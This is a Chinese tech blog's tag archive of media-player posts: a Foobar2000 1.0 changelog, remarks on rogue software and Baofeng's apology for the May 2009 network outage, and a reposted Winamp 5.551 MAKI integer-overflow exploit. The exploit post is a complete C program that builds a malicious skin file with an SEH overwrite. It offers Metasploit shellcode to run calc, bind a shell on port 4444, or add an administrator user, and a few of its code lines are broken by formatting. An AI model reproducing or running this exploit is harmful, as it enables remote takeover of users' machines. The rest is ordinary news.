标签为 "播放器" 的存档

老牌播放器劲旅Foobar2000终更新,迎来1.0时代

      非常古老但经典的播放器,玩音乐的朋友应该对Foobar2000再熟悉不过了,秋天以前也曾试用过,但由于界面简单,操作不便等原因用了一次就弃之不用了。
      曾经Foobar2000更新速度非常之快,但自从上一个版本0.9.6.9之后,就再也没有更新。直到昨天,Foobar2000终于放出了1.0测试版。
      更新内容很多,但秋天下载使用之后发现变化仍然不是很大,如果有Foobar2000的发烧友可以下载体验一下。
      以下为具体的更新内容:

引用内容 引用内容
1、新的上下文菜单结构,更具创造性的界面布局,不过自定义程度有所降低。
2、内建支持Windows Media和RSP流媒体协议的支持。
3、“编辑”(Edit)菜单操作范围仅限当前选择对象,而不再始终针对整个活动的播放列表。
4、改进和多媒体键盘的兼容性。
5、改进对专辑艺术信息的支持,并提高自定义性。
6、便携式安装可以继续媒体库和安装文件夹的相对路径。
7、重新制作的参数选择:新的确定/取消/应用按钮,新的标准页面布局。
8、新的选择查看器行为选项。
9、新的伪彩色代码系统,用于状态栏和播放列表视图。
10、改进CD抓轨能力:
- 结果可以实时对比AccurateRip数据库进行重新检查;
- 支持CD-TXT的读取;
- 可以在抓取音频CD(Rip Audio CD)对话框内选择单独音轨。

      Foobar2000 1.0下载地址在这里

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/it-web-news/45

Winamp 5.551 MAKI分析整数溢出漏洞

Winamp 5.551 MAKI分析整数溢出漏洞

复制内容到剪贴板程序代码程序代码
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!

Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552

Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com

As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.

I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!

Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.

—snip–

A quick look at the new gen_ff.dll.
———————————-
loc_12094F62:
mov     ax, [ebx]
movzx   edi, ax       -Extends ax into edi register.-
inc     ebx
push    edi             ; Size
inc     ebx
lea     eax, [ebp+MultiByteStr]
push    ebx             ; Src
push    eax             ; Dst
call    memmove
————————
loc_120951E9:
mov     edi, [ebx]
add     ebx, 4
mov     ax, [ebx]
movzx   esi, ax        -Extends ax into esi register.-
inc     ebx
push    esi             ; Size
inc     ebx
lea     eax, [ebp+var_2014C]  <– This was also changed.
push    ebx             ; Src
push    eax             ; Dst
call    memmove

This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.

=555.1 .dll=
———-
movsx esi, ax  = movsx(dest , source );
Copies source operand dest and extends the value.

Changed in the new gen_ff.dll.
=555.2 .dll=
———-
movzx esi, ax

Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.

Destination= 16 – 32 bit.
Source =     8 or a 16byte or maybe even 1 byte of memory
Source =     the destination must be of greater value than the source.

This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.

This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.

—snip–

Special thanks to str0ke 🙂

Credits to n00b for writing exploit code !!
Progression is always a good thing.
———-
Disclaimer
———-
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

***************************************************************/

#include <stdio.h>
#define MAKI "mcvcore.maki"

unsigned char First_Header[] =
{
    0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
    0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
    0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
    0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
    0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
    0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
    0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
    0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
    0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
    0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
    0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
    0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
    0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
    0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
    0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
    0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
    0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
    0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
    0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
    0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
    0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
    0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
    0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
    0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
    0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
    0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
    0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
    0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
    0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
    0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0
x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
    0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
    0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
    0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
    0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
    0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
    0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
    0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
    0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
    0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
    0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
    0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
    0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
    0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
    0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
    0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
    0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
    0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
    0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
    0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
    0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
    0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
    0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
    0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
    0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
    0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
    0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
    0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
    0x6C, 0x73, 0x37, 0x00
};

/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF
};

/* win32_exec –  EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */

char Calc_ShellCode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
    "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
    "\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
    "\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
    "\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
    "\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
    "\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    "\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
    "\x4e\x46\x43\x36\x42\x50\x5a";

/* win32_bind –  EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */

char Bind_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
    "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
    "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
    "\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    "\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
    "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
    "\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
    "\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
    "\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
    "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
    "\x43\x55\x43
\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
    "\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
    "\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
    "\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
    "\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
    "\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
    "\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
    "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
    "\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
    "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a";

/* win32_adduser –  PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */

char Add_User_Shellcode [] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
    "\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
    "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
    "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
    "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
    "\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
    "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
    "\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
    "\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
    "\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
    "\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
    "\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
    "\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
    "\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
    "\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
    "\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
    "\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
    "\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
    "\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
    "\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
    "\x41\x44\x46\x44\x46\x44\x42\x30\x5a";

unsigned char Junk1 ='A';

int main()
{
    FILE *fp;
    int i;

    if ((fp = fopen(MAKI, "wb")) == NULL)
    {
        printf("File %s write error\n", MAKI);
        return(0);
    }

    for (i=0; i<sizeof(First_Header); i++)
        fputc(First_Header[i], fp);

    for (i=0; i<sizeof(Exception); i++)
        fputc(Exception[i], fp);

    for (i=0;i<16751;i++)
    {
        fwrite(&Junk1,1,1,fp);
    }
    fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
    fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */

    int input;

    printf("\n——————————————————");
    printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
    printf("\n\nExploit created by n00b");
    printf( "\n[1]. Calc Shell_Code" );
    printf( "\n[2]. Bind Shell_Code on port 4444" );
    printf( "\n[3]. Add user Shell_Code" );
    printf( "\n[4]. To exit and cancel" );
    printf( "\nPlease chose your Shell_Code:" );
    scanf( "%d", &input );
    switch ( input )
    {
    case 1:
        for (i=0; i<sizeof(Calc_ShellCode); i++)
            fputc(Calc_ShellCode[i], fp);
        break;
    case 2:
        for (i=0; i<sizeof(Bind_Shellcode); i++)
            fputc(Bind_Shellcode[i], fp);
        break;
    case 3:
        for (i=0; i
<sizeof(Add_User_Shellcode); i++)
            fputc(Add_User_Shellcode[i], fp);
        break;
    case 4:
        return 0;
        break;
    }
    fclose(fp);
    return 0;
}

// milw0rm.com [2009-05-26]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/198

暴风事件带来的新一轮流氓软件口水战

      暴风影音造成的网络堵塞时间将暴风影音推上了舆论的风口浪尖之上,同时它自身携带的流氓软件“特质”也被网民一一发掘出来。于是乎,网上针对暴风的声讨一浪高过一浪,更大对流氓软件掀起新一轮批判潮的趋势。在声讨的声音中,网易无疑是声音最响的一个,为此专门设置了一个频道–新流氓软件调查,鼓励网民自由举报自己遇到的各种各样的流氓软件。
      各位请看这里:http://tech.163.com/special/00093DHH/xinliumang.html令人啼笑皆非的是各位网友的回复和举报:

引用内容 引用内容
网易四川成都网友 ip:222.212.*.*:
2009-05-27 13:07:50 发表
我举报电脑是流氓软件,详细情况:
看了上面这么多软件 。 都是流氓软件。 那电脑更是流氓软件。

引用内容 引用内容
网易江西网友 ip:118.212.*.*:
2009-05-27 08:51:44 发表
我举报windows是流氓软件,详细情况:我举报windows系列是流氓软件,详细情况:最流氓的软件就是它!自动在C盘安装许多莫名其妙的文件,大部分用户根本不知道它们都是干嘛用的

引用内容 引用内容
网易河南洛阳网友 ip:123.5.*.*:
2009-05-27 11:30:03 发表
我举报网易是流氓软件,详细情况:网易老发些不健康的帖子祸害青少年~~

引用内容 引用内容
网易上海嘉定网友 ip:221.239.*.*:
2009-05-27 13:29:28 发表
我举报网易是流氓软件,详细情况:首页广告老是自动展开,占据整个页面, 还要看完才会自动收缩,经常误点。无故关闭新闻回帖功能.网易弹出卖衣服广告太流氓,我打开网易弹出一次就好了,每打开一个栏目都弹出,你烦不烦

。。。。

      看完你想到了什么?那就是你会发现整个社会到处都是流氓,以后大家见面打招呼的流行用语应该升级了:今天你流氓了吗?
      分析一下的话实际上是中国人的病态消费心理才给这么多流氓软件的滋生提供了温床–共享软件要么无人问津,要么遭遇疯狂的破解、盗版;但人家总要吃饭吧,于是有些软件便开始转型为免费软件,当然这个免费的午餐也不是那么容易吃到的,充斥着广告,弹窗,甚至是后门。一个典型的例子是金山词霸,一款非常优秀的软件,但因为遭遇了盗版,金山转而和google合作开发了谷歌金山词霸合作版,免费是免费了,但以前没有的广告来了,就在我写这篇文章的时候,机器上装的谷歌金山词霸刚刚更新了,点出来一看,是软件界面下方增加了一个广告位。
      有人说只要国人一天的版权意识不变,流氓软件就会存在一天,此话入木三分。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/202

暴风影音正式就5.19网络堵塞事件道歉

      在5月19日全国大面积网络堵塞事件之后,因国内众多媒体及网民将此次事件毛头直指暴风公司,虽然有黑客攻击DNS服务器在先,但如果不是暴风影音在后台不间断尝试连接服务器的话,此次事件不会造成如此大规模的不良后果。
      事发5天后,24日,暴风公司终于就这一事件发表道歉声明,全文内容如下:

引用内容 引用内容
      各位网民及暴风的新老用户:

      在“5.19网络阻塞”事件中,网民和众多暴风影音新老用户的正常生活和工作都受到了影响。在这一事件当中,和众多受害者一样,暴风影音也蒙受了巨大的损失,但作为事件涉及的重要一方,同时,特别是当有声音质疑暴风并未承担起对用户的责任,暴风意识到需要再次对广大网民和用户表示歉意和进行说明。
    
      在事件发生后,暴风进行了反思,该事件因涉及暴风而扩大了影响,表现出公司在提供的产品和服务上存在不足,需要我们及时完善。暴风公司高度重视这一点,并立刻展开了相关工作,在此也感谢用户和网民及时提出的任何建议和意见。
    
      自19日晚以来,暴风公司几乎倾注全面精力,进行了以下工作:

      1、19日晚开始,就在工信部领导下,配合电信、网通,以及dnspod,积极应对处理网络中断问题。协助恢复网络正常服务。工信部已于20日晚发布正式通告,表示“截至20日凌晨1时20分,受影响地区的互联网服务基本恢复正常”。

      2、积极收集证据,配合dnspod报案,配合工信部网络安全保障局和公安局网监处调查案情,争取早日捉拿对dnspod发起攻击的事件始作俑者。5月23日晚,dnspod和暴风公司已经将整理好的相关材料和服务器数据上交公安局网监处,正式完成报案程序。

      3、在19日晚暴风域名解析服务器发生中断时,迅速协调替代方案,转移DNS域名解析地址。同时,开始紧急部署备份域名解析服务器,并于5月22日完成部署上线,由此杜绝此类问题的再次发生。

      4、产品服务的方面,暴风软件的升级机制,存在在网络环境异常情况(如dns中断)下的考虑不足。暴风公司立刻开始进行机制的修改。暴风已于本周日完成程序开发,并马上投入到测试和用户更新中。

      最后,暴风一直以来受到广大用户、业界人士和媒体的关注和支持,在此,暴风表示深深的感谢。断网事件发生以来,众多的用户、媒体包括产业人士给予了暴风很大的理解和支持,对于你们的安慰、建议,暴风更是感激。暴风会尽全力配合司法部门尽早缉拿犯罪分子。

暴风网际科技有限公司
2009年5月24日

      希望暴风这次亡羊补牢能挽回一部分用户的信任,但无论如何,一个不争的事实是,很多装击必备软件中都留有后门,不知何时这样的局面才能有所改观。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/204

AirPlay-v20090524发布下载

      AirPlay-v20090524发布下载
